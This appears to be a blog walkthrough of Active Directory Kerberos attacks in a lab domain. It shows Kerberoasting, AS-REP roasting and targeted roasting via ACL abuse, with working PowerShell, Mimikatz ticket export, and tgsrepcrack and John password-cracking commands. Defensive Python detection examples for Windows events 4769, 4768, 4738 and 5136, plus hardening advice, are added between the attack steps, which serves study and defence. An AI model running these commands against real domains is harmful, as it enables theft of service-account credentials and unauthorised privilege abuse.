
Find user accounts used as service accounts (user objects that have a servicePrincipalName set):

PS C:\Users\victim.SECURITY\Downloads\ADModule-master\ADModule-master> Import-Module .\Microsoft.ActiveDirectory.Management.dll

PS C:\Users\victim.SECURITY\Downloads\ADModule-master\ADModule-master\ActiveDirectory> Import-Module .\ActiveDirectory.psd1

PS C:\Users\victim.SECURITY\Downloads\ADModule-master\ADModule-master\ActiveDirectory> Get-ADUser -Filter {serviceprincipalname -ne "$null"} -Properties serviceprincipalname

Check whether the TGS has been granted (it should now appear in the ticket cache):

PS C:\Users\victim.SECURITY\Downloads\ADModule-master\ADModule-master\ActiveDirectory> klist

Export all tickets using mimikatz:

PS C:\Users\victim.SECURITY\Downloads\PowerSploit-master\PowerSploit-master\Exfiltration> Invoke-Mimikatz -Command '"kerberos::list /export"'

https://github.com/nidem/kerberoast/blob/master/tgsrepcrack.py

PS C:\Users\victim.SECURITY\Downloads\kerberoast-master\kerberoast-master> python.exe .\tgsrepcrack.py .\10k-worst-passwords.txt .\2-40a50000-victim@ldap~WIN-2RUMVG5JPOC.security.local~security.local-SECURITY.LOCAL.kirbi

This recovers the service account's password from the exported ticket: the cracking runs offline against the wordlist, so the domain controller sees nothing beyond the single TGS request.
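From the defender's side, the only trace the procedure above leaves on the domain controller is the TGS request itself, logged as Security Event ID 4769. The following is an added detection example written for this post (not code from the post or from any of the tools it uses): it walks a small constructed set of 4769 records and alerts when one account obtains RC4-encrypted service tickets (Ticket Encryption Type 0x17, the type the cracking tools above expect) for several distinct user-owned service accounts in a short window. Field names, the sample values and the thresholds are assumptions for illustration.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample of Security Event ID 4769 (Kerberos service ticket
# requested), reduced to the fields a SIEM would extract. All values are made up.
# "service" models the 4769 Service Name field, i.e. the account that owns the
# SPN (a trailing $ marks a computer account); "enc" is Ticket Encryption Type.
SAMPLE_4769 = [
    {"time": "2024-01-10T10:00:01", "account": "victim", "service": "WIN-DC01$", "enc": "0x12", "status": "0x0"},
    {"time": "2024-01-10T10:00:03", "account": "victim", "service": "sqlsvc",    "enc": "0x17", "status": "0x0"},
    {"time": "2024-01-10T10:00:04", "account": "victim", "service": "websvc",    "enc": "0x17", "status": "0x0"},
    {"time": "2024-01-10T10:00:05", "account": "victim", "service": "backupsvc", "enc": "0x17", "status": "0x0"},
    {"time": "2024-01-10T10:00:06", "account": "victim", "service": "sqlsvc",    "enc": "0x17", "status": "0x0"},
    {"time": "2024-01-10T11:30:00", "account": "alice",  "service": "sqlsvc",    "enc": "0x17", "status": "0x0"},
    {"time": "2024-01-10T11:31:00", "account": "alice",  "service": "websvc",    "enc": "0x12", "status": "0x0"},
    {"time": "2024-01-10T11:32:00", "account": "alice",  "service": "backupsvc", "enc": "0x17", "status": "0x1F"},
]

RC4_HMAC = "0x17"            # etype 23: the ticket type offline crackers work on
NOISE_SERVICES = {"krbtgt"}  # the TGS itself is requested constantly and is not a target


def _ts(s):
    return datetime.fromisoformat(s)


def detect_kerberoasting(events, window=timedelta(minutes=5), min_services=3):
    """Alert when one account obtains RC4-encrypted service tickets for at least
    `min_services` distinct user-owned service accounts within `window`.
    Returns a list of (account, first_time_iso, sorted service names)."""
    candidates = defaultdict(list)
    for e in events:
        if e["status"] != "0x0" or e["enc"] != RC4_HMAC:
            continue                      # failed request or AES ticket: not roastable
        svc = e["service"]
        if svc.endswith("$") or svc.lower() in NOISE_SERVICES:
            continue                      # computer accounts have long random, rotated passwords
        candidates[e["account"]].append((_ts(e["time"]), svc))

    alerts = []
    for account, reqs in candidates.items():
        reqs.sort()
        for i, (t_i, _) in enumerate(reqs):
            # distinct services requested in [t_i, t_i + window]
            in_window = {s for t, s in reqs[i:] if t - t_i <= window}
            if len(in_window) >= min_services:
                alerts.append((account, t_i.isoformat(), sorted(in_window)))
                break                     # one alert per account is enough
    return alerts


if __name__ == "__main__":
    for account, when, services in detect_kerberoasting(SAMPLE_4769):
        print(f"[!] possible Kerberoasting by {account} at {when}: {services}")
```

The RC4 filter is what keeps this rule quiet: once service accounts are restricted to AES (msDS-SupportedEncryptionTypes) and moved to long random passwords or group Managed Service Accounts, a genuine 0x17 ticket for a user-owned SPN is rare enough to investigate on its own, and the "many distinct services in minutes" pattern separates roasting from a user who legitimately touches one SQL server.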

Enumerating accounts with Kerberos pre-authentication disabled:

Using PowerView (dev branch):

PS C:\Users\victim.SECURITY\Downloads> Get-DomainUser -PreauthNotRequired -Verbose

Using the Active Directory module:

PS C:\Users\victim.SECURITY\Downloads\ADModule-master\ADModule-master\ActiveDirectory> Get-ADUser -filter {DoesNotRequirePreAuth -eq $True} -Properties DoesNotRequirePreAuth

Let's enumerate the ACL permissions held by RDPUsers, using PowerView:

https://raw.githubusercontent.com/nettitude/PoshC2_Python/master/Modules/PowerView_dev.ps1

PS C:\Users\victim.SECURITY\Downloads\PowerTools-master\PowerTools-master\PowerView> Import-Module .\powerview_dev.ps1

PS C:\Users\victim.SECURITY\Downloads\PowerTools-master\PowerTools-master\PowerView> Invoke-ACLScanner -ResolveGUIDs | ?{$_.IdentityReferenceName -match "RDPUsers"}

PS C:\Users\victim.SECURITY\Downloads\PowerTools-master\PowerTools-master\PowerView> Set-DomainObject -Identity DESKTOP-EL1JRUA -XOR @{useraccountcontrol=4194304} -Verbose

(4194304 is 0x400000, the DONT_REQ_PREAUTH bit of userAccountControl; -XOR toggles it, so the target now answers AS-REQs without pre-authentication. This write is what the RDPUsers ACL rights found above allow.)

PS C:\Users\victim.SECURITY\Downloads\PowerTools-master\PowerTools-master\PowerView> Get-DomainUser -PreauthNotRequired -Verbose

Request the encrypted AS-REP for offline brute force:

Let's use ASREPRoast:

https://github.com/HarmJ0y/ASREPRoast

To enumerate all users with Kerberos pre-authentication disabled and request a hash for each:

PS C:\Users\victim.SECURITY\Downloads\ASREPRoast-master\ASREPRoast-master> . .\ASREPRoast.ps1

PS C:\Users\victim.SECURITY\Downloads\ASREPRoast-master\ASREPRoast-master> Get-ASREPHash -UserName DESKTOP-EL1JRUA -Verbose

We take the output to Kali Linux:

root@kali:~# cat user

Paste the hash value from above into this file and save it, then run John against it:

root@kali:~# ./john user --wordlist=wordlist.txt

John recovers the password.
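Two things in this section are worth catching on the defensive side: the userAccountControl change that disables pre-authentication (Event ID 4738 reports the old and new UAC values when an account is modified) and the TGT request that follows, logged as Event ID 4768 with Pre-Authentication Type 0. The block below is an added example written for this post, not code from ASREPRoast or PowerView; it decodes the same 4194304 bit the post sets, audits a constructed directory export the way Get-ADUser -Filter {DoesNotRequirePreAuth -eq $True} does, and scans constructed 4768 records. Field names and sample values are assumptions.

```python
# userAccountControl bits (the 4194304 passed to Set-DomainObject -XOR above is 0x400000).
DONT_REQ_PREAUTH = 0x400000
ACCOUNTDISABLE = 0x2

# Constructed directory export: sAMAccountName -> userAccountControl, as
# Get-ADUser -Properties userAccountControl would return it. Values are made up.
SAMPLE_USERS = {
    "victim":  0x10200,                    # NORMAL_ACCOUNT | DONT_EXPIRE_PASSWORD
    "svc_old": 0x10200 | 0x400000,         # pre-authentication disabled
    "stale":   0x10200 | 0x400000 | 0x2,   # pre-auth disabled, but the account is disabled too
    "alice":   0x200,
}


def accounts_without_preauth(users, include_disabled=False):
    """sAMAccountNames whose userAccountControl has DONT_REQ_PREAUTH set.
    Disabled accounts cannot obtain a TGT, so they are skipped by default."""
    out = []
    for name, uac in users.items():
        if not uac & DONT_REQ_PREAUTH:
            continue
        if not include_disabled and uac & ACCOUNTDISABLE:
            continue
        out.append(name)
    return sorted(out)


def preauth_newly_disabled(old_uac, new_uac):
    """True when a 4738 (user account changed) record shows the pre-auth
    requirement being switched off, which is what the -XOR command above does."""
    return bool(new_uac & DONT_REQ_PREAUTH) and not (old_uac & DONT_REQ_PREAUTH)


# Constructed 4768 (Kerberos authentication ticket requested) records.
# "preauth" models Pre-Authentication Type: 0 means the AS-REQ carried no
# pre-authentication at all; "enc" is Ticket Encryption Type; "status" is Result Code.
SAMPLE_4768 = [
    {"time": "2024-01-10T12:00:00", "account": "svc_old", "preauth": "0", "enc": "0x17", "status": "0x0",  "src": "10.0.0.77"},
    {"time": "2024-01-10T12:00:01", "account": "alice",   "preauth": "2", "enc": "0x12", "status": "0x0",  "src": "10.0.0.5"},
    {"time": "2024-01-10T12:00:02", "account": "victim",  "preauth": "0", "enc": "0x17", "status": "0x19", "src": "10.0.0.77"},
    {"time": "2024-01-10T12:00:03", "account": "svc_old", "preauth": "0", "enc": "0x17", "status": "0x0",  "src": "10.0.0.77"},
]


def detect_asrep_roast(events):
    """A *successful* TGT issuance (Result Code 0x0) with Pre-Authentication Type 0
    is an AS-REP that anyone could have requested and taken offline. A 0x19
    (KDC_ERR_PREAUTH_REQUIRED) with type 0 is the normal first leg of a Windows
    logon and is ignored. Returns deduplicated (account, source, etype) tuples."""
    hits = []
    for e in events:
        if e["preauth"] != "0" or e["status"] != "0x0":
            continue
        key = (e["account"], e["src"], e["enc"])
        if key not in hits:
            hits.append(key)
    return hits


if __name__ == "__main__":
    print("pre-auth disabled:", accounts_without_preauth(SAMPLE_USERS))
    print("AS-REP roastable requests:", detect_asrep_roast(SAMPLE_4768))
```

The audit function is the cheap fix: any account it returns should have the flag cleared unless a specific legacy client needs it, and that list is also the set of accounts to watch in the 4768 feed. Requiring AES-only tickets (so the AS-REP is etype 0x12 rather than 0x17) does not stop the request but makes the offline cracking far slower than the wordlist run shown above.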

Using PowerView, check whether the user already has an SPN:

PS C:\Users\victim.SECURITY\Downloads\ASREPRoast-master\ASREPRoast-master> Get-DomainUser -Identity administrator | select serviceprincipalname

Using the Active Directory module:

PS C:\Users\victim.SECURITY\Downloads\ADModule-master\ADModule-master> Get-ADUser -Identity administrator -Properties servicePrincipalName | select servicePrincipalName

Set an SPN for the user (it must be unique within the domain):

Set-DomainObject -Identity victim5 -Set @{ServicePrincipalNames='ops/whatever1'}

Using the Active Directory module:

PS C:\Users\victim1\Downloads\ADModule-master\ADModule-master> Set-ADUser -Identity victim5 -ServicePrincipalNames @{Add='ops/whatever1'}

PS C:\Users\victim3\Downloads\tool\tool\ASREPRoast-master\ASREPRoast-master> Get-DomainUser -Identity victim5 | select serviceprincipalname

Request a service ticket for the new SPN:

PS C:\Users\victim3\Downloads\tool\tool\kerberoast-master\kerberoast-master> Add-Type -AssemblyName system.identitymodel

PS C:\Users\victim3\Downloads\tool\tool\kerberoast-master\kerberoast-master> New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList "ops/whatever1"

Check whether the ticket has been granted:

PS C:\Users\victim3\Downloads\tool\tool\kerberoast-master\kerberoast-master> klist

Export all tickets using mimikatz:

PS C:\Users\victim3\Downloads\tool\tool\kerberoast-master\kerberoast-master> Invoke-Mimikatz -Command '"kerberos::list /export"'

The exported ticket can now be cracked offline in the same way:

PS C:\Users\victim3\Downloads\tool\tool\kerberoast-master\kerberoast-master> python.exe .\tgsrepcrack.py .\10k-worst-passwords.txt .\2-40a10000-administrator@ops~whatever1-SECURITY.LOCAL.kirbi
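This targeted variant differs from the first section in one observable way: a servicePrincipalName value is written onto a user object shortly before the ticket request. With Directory Service Changes auditing enabled, that write is logged as Event ID 5136 (attribute servicePrincipalName, Operation Type "Value Added"), and the request that follows is the usual 4769. The block below is an added example written for this post, not part of PowerView, the AD module or kerberoast; it correlates constructed 5136 and 4769 records and flags SPN additions on user objects that are followed by an RC4 service-ticket request for that same account. Field names and sample values are assumptions; the 5136 operation-type codes are the standard %%14674 (Value Added) and %%14675 (Value Deleted).

```python
from datetime import datetime, timedelta

VALUE_ADDED = "%%14674"   # 5136 Operation Type for an attribute value being added
RC4_HMAC = "0x17"


def _ts(s):
    return datetime.fromisoformat(s)


# Constructed Event ID 5136 (directory service object modified) records,
# reduced to the fields that matter here. All values are made up.
SAMPLE_5136 = [
    {"time": "2024-01-10T14:00:00", "subject": "victim3", "object": "victim5", "class": "user",
     "attribute": "servicePrincipalName", "op": VALUE_ADDED, "value": "ops/whatever1"},
    {"time": "2024-01-10T14:05:00", "subject": "Administrator", "object": "WEB01$", "class": "computer",
     "attribute": "servicePrincipalName", "op": VALUE_ADDED, "value": "HTTP/web01.security.local"},
    {"time": "2024-01-10T14:06:00", "subject": "Administrator", "object": "victim5", "class": "user",
     "attribute": "description", "op": VALUE_ADDED, "value": "lab account"},
    {"time": "2024-01-10T16:00:00", "subject": "Administrator", "object": "sqlsvc", "class": "user",
     "attribute": "servicePrincipalName", "op": VALUE_ADDED, "value": "MSSQLSvc/sql01:1433"},
]

# Constructed 4769 records: "account" is the requester, "service" is the Service
# Name field (the account owning the SPN), "enc" is Ticket Encryption Type.
SAMPLE_4769 = [
    {"time": "2024-01-10T14:02:00", "account": "victim3", "service": "victim5", "enc": RC4_HMAC},
    {"time": "2024-01-10T14:07:00", "account": "alice",   "service": "WEB01$",  "enc": "0x12"},
]


def spn_added_to_users(changes):
    """5136 records that add a servicePrincipalName to a *user* object.
    Computer objects gain SPNs routinely; user objects rarely do, and a
    non-administrative subject doing it is the ACL abuse shown above."""
    return [c for c in changes
            if c["class"] == "user"
            and c["attribute"].lower() == "serviceprincipalname"
            and c["op"] == VALUE_ADDED]


def targeted_kerberoast_candidates(changes, tickets, window=timedelta(hours=1)):
    """Correlate each SPN addition on a user object with RC4 service-ticket
    requests for that account during the following `window`. Returns one dict
    per SPN addition; 'requesters' is empty when nothing roastable followed,
    and 'self_service' is True when the account that added the SPN is also
    the one that requested the ticket."""
    results = []
    for c in spn_added_to_users(changes):
        t0 = _ts(c["time"])
        requesters = sorted({t["account"] for t in tickets
                             if t["service"] == c["object"]
                             and t["enc"] == RC4_HMAC
                             and t0 <= _ts(t["time"]) <= t0 + window})
        results.append({
            "target": c["object"],
            "spn": c["value"],
            "changed_by": c["subject"],
            "requesters": requesters,
            "self_service": c["subject"] in requesters,
        })
    return results


if __name__ == "__main__":
    for r in targeted_kerberoast_candidates(SAMPLE_5136, SAMPLE_4769):
        flag = "[!]" if r["requesters"] else "[ ]"
        print(flag, r)
```

Even without the ticket correlation, the first function is worth running on its own: every SPN added to a user object is either a deliberate service account (which should then get a gMSA or a long random password) or a write that the subject should not have been able to make, which points back at the ACL entries that Invoke-ACLScanner found.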

@saksham-dixit

Post Author: Saksham dixit
